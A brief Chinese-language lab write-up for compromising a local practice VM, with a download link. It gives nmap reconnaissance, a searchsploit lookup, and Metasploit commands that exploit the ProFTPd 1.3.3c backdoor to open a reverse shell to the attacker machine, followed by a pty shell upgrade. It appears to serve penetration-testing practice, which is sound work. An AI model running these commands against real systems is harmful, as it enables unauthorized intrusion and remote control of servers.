环境
IP:
攻击机:192.168.36.128
靶机:192.168.36.139
链接:
https://pan.baidu.com/s/1wMKfK6eLXb_GbkGX2RwXNg
提取码:olrh
信息收集
nmap -sS {ip/netmask} #扫描某个网段下存活的主机
nmap -sV {ip} #扫描目标ip的开放服务以及版本信息
nmap -A -v T4 {ip} #扫描目标ip的全部信息
检索漏洞
searchsploit ProFTPd 1.3.3c
发现在metasploit中存在该漏洞
漏洞利用
msfconsole #打开msf
search ProFTPd 1.3.3c #搜索该版本下的漏洞
use exploit/unix/ftp/proftpd_133c_backdoor#使用该漏洞
show payloads #查看可以使用的payload
set payload cmd/unix/reverse#使用payload
show options #查看需要设置的参数
set lhost 192.168.36.128#监听(本机)ip
set rhost 192.168.36.139#靶机ip
run/exploit #执行exploit
python -c "import pty;pty.spawn('/bin/bash')" #优化终端